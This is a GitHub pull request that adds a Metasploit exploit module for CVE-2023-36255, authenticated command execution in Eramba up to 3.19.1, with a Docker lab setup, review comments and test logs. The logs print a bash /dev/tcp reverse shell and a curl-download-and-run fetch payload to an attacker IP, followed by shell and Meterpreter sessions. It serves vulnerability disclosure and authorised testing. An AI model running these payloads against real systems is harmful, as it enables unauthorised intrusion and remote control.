Skip to content

Eramba RCE #19957

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 7 commits into from
Mar 25, 2025
Merged

Eramba RCE #19957

merged 7 commits into from
Mar 25, 2025

Conversation

msutovsky-r7
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 commented Mar 13, 2025
edited
Loading

This PR adds a module for CVE-2023-36255 - Eramba Remote Command Execution. It is built on #19494, this is basically just doing last steps.

Vulnerable Application

Eramba is open and free GRC software, used by many companies. It offer mainly risk management solution. Version up to 3.19.1 is vulnerable to authenticated remote command execution. It is neccessary to provide valid credentials. The application allows to execute arbitrary OS commands, which can lead to remote access. Application is available in Docker format. However, after installation, debug mode needs to be enabled. Here's modified Docker compose file for simpler testing (docker-compose.simple-install.yml):

Installation

Docker and docker-compose is required.

  1. git clone https://github.com/eramba/docker
  2. cd docker
  3. Setup database credentials and public URL in .env
  4. Copy following into docker-compose.simple-install.yml
version: '3.19'
services:
  mysql:
    container_name: mysql
    image: mysql:8.0.28-oracle
    command: ["mysqld", "--disable-log-bin"]
    restart: always
    volumes:
      - db-data:/var/lib/mysql
      - ./mysql/conf.d:/etc/mysql/conf.d
      - ./mysql/entrypoint:/docker-entrypoint-initdb.d
    environment:
      MYSQL_DATABASE: ${DB_DATABASE}
      MYSQL_USER: ${DB_USERNAME}
      MYSQL_PASSWORD: ${DB_PASSWORD}
      MYSQL_ROOT_PASSWORD: ${MYSQL_ROOT_PASSWORD}
  redis:
    container_name: redis
    image: redis:6.0.16-alpine
    restart: always
  eramba:
    container_name: eramba
    image: ghcr.io/eramba/eramba:3.19.1
    restart: always
    ports:
      - 8443:443
    volumes:
      - data:/var/www/eramba/app/upgrade/data
      - app:/var/www/eramba
      - logs:/var/www/eramba/app/upgrade/logs
      - ./apache/ssl/mycert.crt:/etc/ssl/certs/mycert.crt
      - ./apache/ssl/mycert.key:/etc/ssl/private/mycert.key
      - ./apache/security.conf:/etc/apache2/conf-available/security.conf
      - ./apache/ports.conf:/etc/apache2/ports.conf
      - ./apache/vhost-ssl.conf:/etc/apache2/sites-available/000-default.conf
      - ./crontab/crontab:/etc/cron.d/eramba-crontab
    environment:
      DB_HOST: ${DB_HOST}
      DB_DATABASE: ${DB_DATABASE}
      DB_USERNAME: ${DB_USERNAME}
      DB_PASSWORD: ${DB_PASSWORD}
      CACHE_URL: ${CACHE_URL}
      USE_PROXY: ${USE_PROXY}
      PROXY_HOST: ${PROXY_HOST}
      PROXY_PORT: ${PROXY_PORT}
      USE_PROXY_AUTH: ${USE_PROXY_AUTH}
      PROXY_AUTH_USER: ${PROXY_AUTH_USER}
      PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
      PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
      DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
      LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
    links:
      - mysql
      - redis
    depends_on:
      - mysql
  cron:
    container_name: cron
    image: ghcr.io/eramba/eramba:3.19.1
    command: ["cron", "-f"]
    entrypoint: ["/docker-cron-entrypoint.sh"]
    restart: always
    volumes:
      - data:/var/www/eramba/app/upgrade/data
      - app:/var/www/eramba
      - logs:/var/www/eramba/app/upgrade/logs
      - ./docker-cron-entrypoint.sh:/docker-cron-entrypoint.sh
      - ./crontab/crontab:/etc/cron.d/eramba-crontab
      - .env:/var/www/docker.env
    environment:
      DB_HOST: ${DB_HOST}
      DB_DATABASE: ${DB_DATABASE}
      DB_USERNAME: ${DB_USERNAME}
      DB_PASSWORD: ${DB_PASSWORD}
      CACHE_URL: ${CACHE_URL}
      USE_PROXY: ${USE_PROXY}
      PROXY_HOST: ${PROXY_HOST}
      PROXY_PORT: ${PROXY_PORT}
      USE_PROXY_AUTH: ${USE_PROXY_AUTH}
      PROXY_AUTH_USER: ${PROXY_AUTH_USER}
      PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
      PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
      DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
      LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
    links:
      - mysql
      - redis
      - eramba
    depends_on:
      - eramba
volumes:
  app:
  data:
  logs:
  db-data:
  1. docker compose -f docker-compose.simple-install.yml up -d

Shut down: docker compose -f docker-compose.simple-install.yml down

Verification Steps

  1. use exploit/linux/http/eramba_rce
  2. set RHOSTS [target IP]
  3. set LHOST [attacker's IP]
  4. set USERNAME [username]
  5. set PASSWORD [password]
  6. exploit

Options

USERNAME

A valid username for Eramba application

PASSWORD

A valid password for Eramba application

Scenarios

msf6 > use exploit/linux/http/eramba_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/eramba_rce)> set RHOSTS 192.168.95.145
RHOSTS => 192.168.95.145
msf6 exploit(linux/http/eramba_rce)> set LHOST 192.168.95.142
LHOST => 192.168.95.142
msf6 exploit(linux/http/eramba_rce)> set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/eramba_rce)> set PASSWORD P4ssw0rd!
PASSWORD => P4ssw0rd!
msf6 exploit(linux/http/eramba_rce) > exploit
[*] Started reverse TCP handler on 192.168.95.142:4444 
[*] Command shell session 1 opened (192.168.95.142:4444 -> 192.168.95.145:38460) at 2025-03-13 12:31:26 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

@smcintyre-r7 smcintyre-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Mar 20, 2025
smcintyre-r7
smcintyre-r7 requested changes Mar 20, 2025
View reviewed changes
documentation/modules/exploit/linux/http/eramba_rce.md Outdated
Comment on lines 112 to 115
## Options

- **USERNAME**: valid username for Eramba application (default: admin)
- **PASSWORD**: valid password for Eramba application (default: admin)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Options typically use H3.

Suggested change
## Options
- **USERNAME**: valid username for Eramba application (default: admin)
- **PASSWORD**: valid password for Eramba application (default: admin)
## Options
### USERNAME
A valid username for Eramba application
### PASSWORD
A valid password for Eramba application

modules/exploits/linux/http/eramba_rce.rb Outdated
Comment on lines 68 to 69
OptString.new('USERNAME', [ true, 'The username to authenticate with']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The docs noted that there was a default username and password, but it's not used here.

modules/exploits/linux/http/eramba_rce.rb Outdated
Comment on lines 88 to 90
return Exploit::CheckCode::Appears if version <= Rex::Version.new('3.19.1')

return Exploit::CheckCode::Safe
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can we add the version to the check code here? That'll be useful for debugging.

Suggested change
return Exploit::CheckCode::Appears if version <= Rex::Version.new('3.19.1')
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Appears("Eramba Version #{version} is affected.") if version <= Rex::Version.new('3.19.1')
return Exploit::CheckCode::Safe("Eramba Version #{version} is not affected.")

@smcintyre-r7 smcintyre-r7 self-assigned this Mar 20, 2025
@smcintyre-r7 smcintyre-r7 moved this from Todo to In Progress in Metasploit Kanban Mar 20, 2025
smcintyre-r7
smcintyre-r7 requested changes Mar 20, 2025
View reviewed changes
modules/exploits/linux/http/eramba_rce.rb Outdated
Comment on lines 38 to 44
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is filtering out fetch payloads. The docker container has curl and wget installed and I was able to test cmd/linux/http/x64/meterpreter/reverse_tcp using curl but had to make these changes:

Suggested change
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Targets' => [
[
'Command',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,

@github-project-automation github-project-automation bot moved this from In Progress to Waiting on Contributor in Metasploit Kanban Mar 20, 2025
smcintyre-r7
smcintyre-r7 approved these changes Mar 25, 2025
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM, I was able to successfully test both payloads now.

metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > show options 

Module options (exploit/linux/http/eramba_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                         ing-metasploit.html
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Eramba
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Command



View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[+] bash -c '0<&31-;exec 31<>/dev/tcp/192.168.159.128/4444;sh <&31 >&31 2>&31'
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Eramba Version 3.19.1 is affected.
[-] Exploit aborted due to failure: unexpected-reply: Failed to login
[*] Exploit completed, but no session was created.
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set PASSWORD Password1!
PASSWORD => Password1!
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[+] bash -c '0<&172-;exec 172<>/dev/tcp/192.168.159.128/4444;sh <&172 >&172 2>&172'
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Eramba Version 3.19.1 is affected.
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.128:47214) at 2025-03-25 13:51:46 -0400
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.159.128 - Command shell session 1 closed.  Reason: User exit
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > set PAYLOAD  cmd/linux/http/x64/meterpreter/reverse_tcp 
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
metasploit-framework.pr (S:0 J:0) exploit(linux/http/eramba_rce) > run
[*] Command to run on remote host: curl -so /tmp/YVjzJlhFY http://192.168.159.128:8080/jvE_gjDKxuQo86-91TitNQ;chmod +x /tmp/YVjzJlhFY;/tmp/YVjzJlhFY&
[*] Fetch handler listening on 192.168.159.128:8080
[*] HTTP server started
[*] Adding resource /jvE_gjDKxuQo86-91TitNQ
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Eramba Version 3.19.1 is affected.
[*] Client 192.168.159.128 requested /jvE_gjDKxuQo86-91TitNQ
[*] Sending payload to 192.168.159.128 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:51982) at 2025-03-25 13:52:33 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 10.89.4.4
OS           : Debian 11.6 (Linux 6.13.7-100.fc40.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/var/www/eramba/app/upgrade/webroot
meterpreter >

@github-project-automation github-project-automation bot moved this from Waiting on Contributor to In Progress in Metasploit Kanban Mar 25, 2025
@smcintyre-r7 smcintyre-r7 merged commit bf1f919 into rapid7:master Mar 25, 2025
18 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Mar 25, 2025
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds an exploit for CVE-2023-36255 which is an authenticated command injection vulnerability in Eramba.

@msutovsky-r7 msutovsky-r7 changed the title Auxmodule eramba update Eramba RCE Apr 1, 2025
@trvnt-stefan
Copy link
Contributor

Thanks to @msutovsky-r7 and @smcintyre-r7 for completing our initial pull request (#19494). 👍

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@msutovsky-r7 @smcintyre-r7 @trvnt-stefan